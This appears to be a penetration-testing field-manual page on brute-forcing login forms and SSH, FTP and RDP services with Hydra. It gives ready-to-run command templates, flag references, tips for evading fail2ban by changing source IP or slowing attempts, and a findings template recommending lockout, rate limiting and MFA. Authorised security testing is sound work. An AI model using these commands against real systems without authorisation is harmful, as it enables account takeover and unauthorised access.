Field Manual

Login BruteForce Hydra

3 min read

🛡️ Methodology Checklist

  • Identify login form method (POST/GET) and parameters with Burp
  • Note failure condition (text in response on bad login)
  • HTTP POST form: hydra -l [USER] -P [WORDLIST] [TARGET] http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
  • SSH: hydra -L users.txt -P pass.txt ssh://[TARGET]
  • FTP: hydra -l admin -P pass.txt ftp://[TARGET]
  • RDP: hydra -L users.txt -P pass.txt rdp://[TARGET]
  • Check for account lockout before brute-forcing

🎯 Operational Context

Use when: Login form or service credential brute force — Hydra handles HTTP forms, SSH, FTP, SMB, RDP, and dozens of other protocols. Think Dumber First: Test manually first — confirm the failure message string exactly. A wrong failure string means Hydra reports everything as valid or nothing at all. curl -d 'user=test&pass=test' http://[TARGET]/login and note the exact error text. Skip when: Rate limiting or CAPTCHA blocks automated login — use targeted manual testing instead.

⚡ Tactical Cheatsheet

CommandTactical Outcome
hydra -L [USERLIST] -P [PASSLIST] [TARGET_IP] sshSSH brute force with wordlists
hydra -L [USERLIST] -P [PASSLIST] -s [PORT] -V [TARGET_IP] ftpFTP on non-standard port (-V = verbose)
hydra -l [USER] -p [PASS] -M [TARGETS] sshMulti-host with single credential pair
hydra -L [USERLIST] -P [PASSLIST] -f [TARGET_IP] -s [PORT] http-post-form "[URI]:[PARAMS]:F=[FAIL_STRING]"Web login form brute force
hydra -l [USER] -P [PASSLIST] [TARGET_IP] http-get [DIR] -s [PORT]Basic HTTP Auth brute force
hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 [TARGET_IP] rdpOn-the-fly password generation for RDP
echo "[BASE64]" | base64 -dDecode captured Basic Auth header

🔬 Deep Dive & Workflow

Flag Reference

FlagMeaning
-L / -PFile path for userlist / passlist
-l / -pSingle username / password string
-fStop on first success (always use on CPTS)
-tThreads (default fast; use -t 4 if connections drop)
-sNon-standard port
-VVerbose — print every attempt
-MMulti-host target file
-x min:max:charsetOn-the-fly generation

http-post-form Syntax

"[URI]:[param1]=^USER^&[param2]=^PASS^:F=[failure_string]"
  • ^USER^ and ^PASS^ = injection placeholders
  • F= = failure string match (e.g., F=Invalid credentials)
  • S= = success condition (e.g., S=302 for redirect, S=Welcome)
hydra -L users.txt -P passes.txt -f 10.10.10.5 -s 80 \
  http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"

Basic HTTP Auth (Browser Pop-up)

Browser shows native pop-up (not HTML form) = Basic Auth = use http-get:

hydra -l basic-auth-user -P passwords.txt 127.0.0.1 http-get / -s 81

Capture Authorization: Basic header in Burp → Base64 decode → reveals user:pass.

Common Pitfalls

  • Never concatenate IP:port (10.10.10.5:8080) — use -s 8080 separately. Hydra tries to DNS-resolve the whole string.
  • http-post-form is finicky — triple-check: no extra spaces around colons in the format string
  • CSRF tokens — Hydra static strings fail; need Burp Macros or custom Python script
  • Service crashing — reduce to -t 4 or -t 1

🛠️ Troubleshooting & Edge Cases

ProblemCauseFix
Hydra reports everything as validWrong failure stringCheck -f 'F=Invalid' — failure string must match exactly what server returns on bad login
Hydra reports no valid loginsToo strict failure matchTest manually; try grep on response body for partial match string
HTTP form brute misses CSRFCSRF token requiredHydra cannot handle CSRF tokens — use Burp Intruder with macro or ffuf with CSRF extraction
SSH brute blocked by fail2banIP temporarily bannedChange source IP or reduce threads: -t 2; add delay: -W 3 (3 seconds between attempts)
Form POST params wrongParameter names incorrectCapture request in Burp; copy exact POST body format: username=^USER^&password=^PASS^

📝 Reporting Trigger

Finding Title: Login Brute Force Successful — Credentials Compromised Impact: Successful brute force of web application login provides authenticated access, enabling further exploitation of authenticated-only functionality including data access, admin operations, and potential privilege escalation. Root Cause: No rate limiting, CAPTCHA, or account lockout implemented on login endpoint. Weak password susceptible to dictionary attack. Recommendation: Implement account lockout after 3-5 failed attempts. Add CAPTCHA for repeated failures. Implement rate limiting per IP and per account. Enable MFA. Alert on multiple failed login attempts.

🔗 Related Nodes

Graph View

Backlinks